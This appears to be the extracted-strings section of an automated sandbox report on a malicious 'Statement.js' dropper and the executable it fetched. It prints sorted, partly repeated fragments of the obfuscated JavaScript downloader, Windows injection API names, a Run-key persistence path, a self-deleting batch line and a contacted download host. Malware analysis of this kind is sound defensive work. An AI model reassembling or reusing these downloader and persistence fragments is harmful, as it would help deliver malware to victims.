Unicode based on Runtime Data (wscript.exe )

IETldDllVersionLow

Unicode based on Runtime Data (wscript.exe )

IETldVersionHigh

Unicode based on Runtime Data (wscript.exe )

IETldVersionLow

Unicode based on Runtime Data (wscript.exe )

IMM32.dll

Ansi based on Dropped File (download[1].aspx.2515276793)

ImmInstallIMEA

Ansi based on Dropped File (download[1].aspx.2515276793)

InitializeCriticalSection

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

IntranetName

Unicode based on Runtime Data (wscript.exe )

KERNEL32.DLL

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

KERNEL32.dll

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

KERNELBASE

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

KV8(@

Ansi based on Dropped File (download[1].aspx.2515276793)

LanguageList

Unicode based on Runtime Data (wscript.exe )

LastScavenge

Unicode based on Runtime Data (wscript.exe )

LastScavenge_TIMESTAMP

Unicode based on Runtime Data (wscript.exe )

LdrGetProcedureAddress

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

LdrLoadDll

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

LeaveCriticalSection

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

llWindow

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

LoadAppInit_DLLs

Unicode based on Runtime Data (goJnUL86e.exe )

LoadLibraryA

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

LoadLibraryW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

Local\

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

Local\ShellReadyEvent

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

lstrcatA

Ansi based on Dropped File (download[1].aspx.2515276793)

lstrcatW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

lstrcmpA

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

lstrcmpiA

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

lstrcmpW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

lstrcpynA

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

lstrcpyW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

lstrlenA

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

lstrlenW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

MachinePreferredUILanguages

Unicode based on Runtime Data (goJnUL86e.exe )

MapViewOfFile

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

MaxFileSize

Unicode based on Runtime Data (wscript.exe )

mbstowcs

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

memcpy

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

memset

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

Modules32

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

Modules64

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

mroot%\system32\svchost.exe

Unicode based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

MultiByteToWideChar

Ansi based on Dropped File (download[1].aspx.2515276793)

Network

Unicode based on Runtime Data (wscript.exe )

NtClose

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

NtCreateKey

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtCreateSection

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

ntdll.dll

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NTDLL.DLL

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

NTDSAPI.dll

Ansi based on Dropped File (download[1].aspx.2515276793)

NtMapViewOfSection

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtOpenProcessToken

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtOpenSection

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtQueryInformationProcess

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtQueryInformationToken

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtQueryValueKey

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtQueryVirtualMemory

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtResumeProcess

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtSuspendProcess

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtUnmapViewOfSection

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

ole32.dll

Ansi based on Dropped File (download[1].aspx.2515276793)

OpenEventA

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

OpenProcess

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

p^6Qyp

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

PageAllocatorSystemHeapIsPrivate

Unicode based on Runtime Data (goJnUL86e.exe )

PageAllocatorUseSystemHeap

Unicode based on Runtime Data (goJnUL86e.exe )

PathFindExtensionW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

PathFindFileNameW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

pipe\

Unicode based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

PreferExternalManifest

Unicode based on Runtime Data (goJnUL86e.exe )

PreferredUILanguages

Unicode based on Runtime Data (goJnUL86e.exe )

ProxyBypass

Unicode based on Runtime Data (wscript.exe )

ProxyEnable

Unicode based on Runtime Data (wscript.exe )

ProxyOverride

Unicode based on Runtime Data (wscript.exe )

ProxyServer

Unicode based on Runtime Data (wscript.exe )

QxgoLa8eWQJs=this['4163746976oxwjUb65584FPwwmJ62acIeHet6A65Gas6374'.tr()];

Ansi based on Hybrid Analysis (Statement.js.bin)

rasman

Ansi based on Runtime Data (wscript.exe )

RASMAN

Ansi based on Runtime Data (wscript.exe )

ReadFile

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

Redirection

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

RegCloseKey

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

RegCreateKeyW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

RegEnumValueW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

RegOpenKeyW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

RegSetValueExW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

ReleaseBindInfo

Ansi based on Dropped File (download[1].aspx.2515276793)

ResetEvent

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

ResumeThread

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

RtlImageNtHeader

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

RtlInitUnicodeString

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

RtlNtStatusToDosError

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

RtlUnwind

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

S-%u-%u

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

SafeDllSearchMode

Unicode based on Runtime Data (goJnUL86e.exe )

SavedLegacySettings

Unicode based on Runtime Data (wscript.exe )

SECU_

Ansi based on Image Processing (screen_0.png)

Security_HKLM_only

Unicode based on Runtime Data (goJnUL86e.exe )

SendMessageW

Ansi based on Dropped File (download[1].aspx.2515276793)

ServicesActive

Unicode based on Runtime Data (wscript.exe )

SetEndOfFile

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

SetEvent

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

SetFilePointer

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

SetLastError

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

SETUPAPI.dll

Ansi based on Dropped File (download[1].aspx.2515276793)

SetupDiDestroyDriverInfoList

Ansi based on Dropped File (download[1].aspx.2515276793)

SetupDiGetActualSectionToInstallA

Ansi based on Dropped File (download[1].aspx.2515276793)

SetupGetLineByIndexA

Ansi based on Dropped File (download[1].aspx.2515276793)

SHELL32.dll

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

ShellExecuteW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

SHLWAPI.dll

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

Sleep

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

Software\AppDataLow\Software\Microsoft

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

SourcePath

Unicode based on Runtime Data (goJnUL86e.exe )

StaleIETldCache

Unicode based on Runtime Data (wscript.exe )

StrCmpNIA

Ansi based on Dropped File (download[1].aspx.2515276793)

StrStrIW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

SYSTEM

Unicode based on Runtime Data (goJnUL86e.exe )

talkuktelecom-my.sharepoint.com

Ansi based on PCAP Processing (PCAP)

temroot%\system32\c_1252.NLS

Unicode based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

TLDUpdates

Unicode based on Runtime Data (wscript.exe )

TPGmyuZNW=""+new Date();while(bTdeP18rrN>(((0x8800000>>>5)>>(0xd*0x1+0x1))%(0x261144599b8cde00/2743048799697821184))){cN0iJCu=TPGmyuZNW.split(ISFyFJdm3db);V7EsmVm.push(cN0iJCu[bTdeP18rrN%(3+3)]);

Ansi based on Hybrid Analysis (Statement.js.bin)

TransparentEnabled

Unicode based on Runtime Data (goJnUL86e.exe )

try{WjsincMu04mn=new QxgoLa8eWQJs('4D53584D4Cycko322E58rsLd4D4CozswrPn4854rI r54 lyd50'.tr());while(cTcPk16==0){WjsincMu04mn['6F70656E'.tr()]('4745qlrndpwbzgrvlirbbxperrkswablrcpldHfH qw54'.tr(),CXspSP02[iagCPv], (((0x28d*8+0x218)>>>(234881024>>>0x19))%(0x65990ebcd335b400/7320898873427604480)));

Ansi based on Hybrid Analysis (Statement.js.bin)

TSAppCompat

Unicode based on Runtime Data (goJnUL86e.exe )

TSUserEnabled

Unicode based on Runtime Data (goJnUL86e.exe )

UNCAsIntranet

Unicode based on Runtime Data (wscript.exe )

UnmapViewOfFile

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

urlmon.dll

Ansi based on Dropped File (download[1].aspx.2515276793)

USER32

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

USER32.dll

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

V7EsmVm=[];YEbZZQzlF=(((0x1575d650840a7900*0x5+0x75c997edf4cc800)/(0x195325e1802d2c00*4+0xd5d318b72cc7400))*(6227290810542648320/0x2b35e3ffd1b97600));

Ansi based on Hybrid Analysis (Statement.js.bin)

var bTdeP18rrN=(~((-479*1-87)*(~-2)-(0xd980000>>>19)));

Ansi based on Hybrid Analysis (Statement.js.bin)

Ansi based on Memory/File Scan (Statement.js.bin)

var cTcPk16=0;

Ansi based on Hybrid Analysis (Statement.js.bin)

var iagCPv=14-7*YEbZZQzlF;

Ansi based on Hybrid Analysis (Statement.js.bin)

var ISFyFJdm3db=' ';bTdeP18rrN=bTdeP18rrN*(~(~(0x6e00>>0x7)))*YEbZZQzlF;

Ansi based on Hybrid Analysis (Statement.js.bin)

Ansi based on Hybrid Analysis (Statement.js.bin)

VirtualAlloc

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

VirtualFree

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

VirtualProtect

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

WaitForSingleObject

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

wcstombs

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

wewg2GZ=new QxgoLa8eWQJs('41444F44422Eeqzj537472pUg65616D'.tr());wewg2GZ['6F70qakikeekaxvJ65ixyzh6E'.tr()]();wewg2GZ['74797065'.tr()]=YEbZZQzlF-(~((-56532*1-0x232c)>>(0xf<<32)));

Ansi based on Hybrid Analysis (Statement.js.bin)

wewg2GZ['636C6FmRQfwdxrd 73Y w65'.tr()]();Iw7NDHE3h6L[xxNIVi](kjiamnwS01pn,(((4*0xd+0x1)*(512>>>0x9)+(32768>>0xa))%(1<<0x20)),y_tgb0wb7-YEbZZQzlF);

Ansi based on Hybrid Analysis (Statement.js.bin)

wewg2GZ['77726974dxXkG65'.tr()](WjsincMu04mn['52657370igwUmHc6FyVkpp6E73Ysab 6542ufp6F6479'.tr()]);wewg2GZ['706F73 nbvzb6974696Fg ftQxknj6E'.tr()]=YEbZZQzlF-y_tgb0wb7;wewg2GZ['73617665546F46sjekl696Cqae J65'.tr()](kjiamnwS01pn,y_tgb0wb7);

Ansi based on Hybrid Analysis (Statement.js.bin)

while(WjsincMu04mn['72656164qpwzneLencr79dluHgqpl Jhzcz73746174mcvus65'.tr()]<(YEbZZQzlF+y_tgb0wb7)){ Iw7NDHE3h6L['536C656570'.tr()]((((0x3*66+0x2)>>(0x1<<1))<<(16384>>0xe)));}

Ansi based on Hybrid Analysis (Statement.js.bin)

WinHttpAutoProxySvc

Unicode based on Runtime Data (wscript.exe )

Wow64EnableWow64FsRedirection

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

WpadDecision

Unicode based on Runtime Data (wscript.exe )

WpadDecisionReason

Unicode based on Runtime Data (wscript.exe )

WpadDecisionTime

Unicode based on Runtime Data (wscript.exe )

WpadLastNetwork

Unicode based on Runtime Data (wscript.exe )

WpadNetworkName

Unicode based on Runtime Data (wscript.exe )

WriteFile

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

WritePrivateProfileStructA

Ansi based on Dropped File (download[1].aspx.2515276793)

wsprintfW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

X-%08X%04X

Unicode based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

X50wIu='457870616EasRy pGbyj6445bfodmpt6E7669utx726F6ERownbamKs6D65X Hdv6EsqGbmIc745374zRt Isuybr7269tcmJz6Ephurd6773'.tr();

Ansi based on Hybrid Analysis (Statement.js.bin)

y_tgb0wb7=(~((~0x0)*(0x3<<32)));

Ansi based on Hybrid Analysis (Statement.js.bin)

ZwProtectVirtualMemory

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

ZwQueryInformationProcess

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

{%08X-%04X-%04X-%04X-%08X%04X}

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

{09477111-DE61-43CD-A5AA-D9F7B489301F}

Unicode based on Runtime Data (wscript.exe )

"C:\Statement.js"

Ansi based on Process Commandline (wscript.exe)

%08X-%04X-%04X-%04X-%08X%04X

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

%systemroot%\system32\svchost.exe

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

++iagCPv;if (iagCPv==CXspSP02.length) iagCPv=(((0x103000>>0xc)*(8073834705028118528/8073834705028118528)+(1333788672>>>23))%(~-2));WjsincMu04mn['73656E64'.tr()]();

Ansi based on Hybrid Analysis (Statement.js.bin)

:%uattrib -h -r -s %%1del %%1if exist %%1 goto %udel %%0

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

\\.\pipe\

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

\REGISTRY\USER\%s\%s\

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

\RPC Control\console-0x00000640-lpc-handle

Unicode based on Runtime Data (goJnUL86e.exe )

\Sessions\1\Windows\ApiPort

Unicode based on Runtime Data (goJnUL86e.exe )

\Software\Microsoft\Windows\CurrentVersion\Run

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (wscript.exe )

`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (wscript.exe )

catch(FDCBEIK){}

Ansi based on Hybrid Analysis (Statement.js.bin)

COMDLG32.dll

Ansi based on Dropped File (download[1].aspx.2515276793)

CreateProcessW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

DefaultConnectionSettings

Unicode based on Runtime Data (wscript.exe )

DisableLocalOverride

Unicode based on Runtime Data (goJnUL86e.exe )

ExitProcess

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

function String.prototype.tr(){

Ansi based on Hybrid Analysis (Statement.js.bin)

GetBinaryTypeA

Ansi based on Dropped File (download[1].aspx.2515276793)

GetCurrentProcessId

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetCurrentThreadId

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetLastError

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetModuleFileNameW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetModuleHandleA

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetProcAddress

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetShellWindow

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

GetSystemTimeAsFileTime

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetTempFileNameW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetTempPathW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetWindowsDirectoryA

Ansi based on Dropped File (download[1].aspx.2515276793)

GetWindowThreadProcessId

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

hreadProcessId

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

IETldDllVersionHigh

Unicode based on Runtime Data (wscript.exe )

IETldDllVersionLow

Unicode based on Runtime Data (wscript.exe )

IETldVersionHigh

Unicode based on Runtime Data (wscript.exe )

IETldVersionLow

Unicode based on Runtime Data (wscript.exe )

ImmInstallIMEA

Ansi based on Dropped File (download[1].aspx.2515276793)

LdrGetProcedureAddress

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

Local\

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

Local\ShellReadyEvent

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

mroot%\system32\svchost.exe

Unicode based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

NtCreateKey

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtOpenProcessToken

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtQueryInformationProcess

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtQueryInformationToken

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtQueryValueKey

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtResumeProcess

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtSuspendProcess

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

OpenProcess

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

pipe\

Unicode based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

QxgoLa8eWQJs=this['4163746976oxwjUb65584FPwwmJ62acIeHet6A65Gas6374'.tr()];

Ansi based on Hybrid Analysis (Statement.js.bin)

RegCloseKey

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

RegCreateKeyW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

RegEnumValueW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

RegOpenKeyW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

RegSetValueExW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

ReleaseBindInfo

Ansi based on Dropped File (download[1].aspx.2515276793)

RtlNtStatusToDosError

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

ServicesActive

Unicode based on Runtime Data (wscript.exe )

SetLastError

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

SetupDiDestroyDriverInfoList

Ansi based on Dropped File (download[1].aspx.2515276793)

SetupDiGetActualSectionToInstallA

Ansi based on Dropped File (download[1].aspx.2515276793)

SetupGetLineByIndexA

Ansi based on Dropped File (download[1].aspx.2515276793)

ShellExecuteW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

talkuktelecom-my.sharepoint.com

Ansi based on PCAP Processing (PCAP)

TPGmyuZNW=""+new Date();while(bTdeP18rrN>(((0x8800000>>>5)>>(0xd*0x1+0x1))%(0x261144599b8cde00/2743048799697821184))){cN0iJCu=TPGmyuZNW.split(ISFyFJdm3db);V7EsmVm.push(cN0iJCu[bTdeP18rrN%(3+3)]);

Ansi based on Hybrid Analysis (Statement.js.bin)

TSAppCompat

Unicode based on Runtime Data (goJnUL86e.exe )

V7EsmVm=[];YEbZZQzlF=(((0x1575d650840a7900*0x5+0x75c997edf4cc800)/(0x195325e1802d2c00*4+0xd5d318b72cc7400))*(6227290810542648320/0x2b35e3ffd1b97600));

Ansi based on Hybrid Analysis (Statement.js.bin)

var bTdeP18rrN=(~((-479*1-87)*(~-2)-(0xd980000>>>19)));

Ansi based on Hybrid Analysis (Statement.js.bin)

var ISFyFJdm3db=' ';bTdeP18rrN=bTdeP18rrN*(~(~(0x6e00>>0x7)))*YEbZZQzlF;

Ansi based on Hybrid Analysis (Statement.js.bin)

wewg2GZ=new QxgoLa8eWQJs('41444F44422Eeqzj537472pUg65616D'.tr());wewg2GZ['6F70qakikeekaxvJ65ixyzh6E'.tr()]();wewg2GZ['74797065'.tr()]=YEbZZQzlF-(~((-56532*1-0x232c)>>(0xf<<32)));

Ansi based on Hybrid Analysis (Statement.js.bin)

WinHttpAutoProxySvc

Unicode based on Runtime Data (wscript.exe )

X50wIu='457870616EasRy pGbyj6445bfodmpt6E7669utx726F6ERownbamKs6D65X Hdv6EsqGbmIc745374zRt Isuybr7269tcmJz6Ephurd6773'.tr();

Ansi based on Hybrid Analysis (Statement.js.bin)

y_tgb0wb7=(~((~0x0)*(0x3<<32)));

Ansi based on Hybrid Analysis (Statement.js.bin)

ZwQueryInformationProcess

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

{%08X-%04X-%04X-%04X-%08X%04X}

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

{09477111-DE61-43CD-A5AA-D9F7B489301F}

Unicode based on Runtime Data (wscript.exe )

!This program cannot be run in DOS mode.$

Ansi based on Dropped File (download[1].aspx.2515276793)

.idata

Ansi based on Dropped File (download[1].aspx.2515276793)

.reloc

Ansi based on Dropped File (download[1].aspx.2515276793)

;%n0'

Ansi based on Dropped File (download[1].aspx.2515276793)

\system32\user32.dll

Ansi based on Dropped File (download[1].aspx.2515276793)

`.adata

Ansi based on Dropped File (download[1].aspx.2515276793)

`.data

Ansi based on Dropped File (download[1].aspx.2515276793)

ChooseColorW

Ansi based on Dropped File (download[1].aspx.2515276793)

CoFreeLibrary

Ansi based on Dropped File (download[1].aspx.2515276793)

CoInternetCreateZoneManager

Ansi based on Dropped File (download[1].aspx.2515276793)

COMDLG32.dll

Ansi based on Dropped File (download[1].aspx.2515276793)

dfdfdf

Ansi based on Dropped File (download[1].aspx.2515276793)

dfdfdfdf

Ansi based on Dropped File (download[1].aspx.2515276793)

DsFreeSchemaGuidMapA

Ansi based on Dropped File (download[1].aspx.2515276793)

DsFreeSpnArrayW

Ansi based on Dropped File (download[1].aspx.2515276793)

FindNextVolumeMountPointA

Ansi based on Dropped File (download[1].aspx.2515276793)

FindTextW

Ansi based on Dropped File (download[1].aspx.2515276793)

GetBinaryTypeA
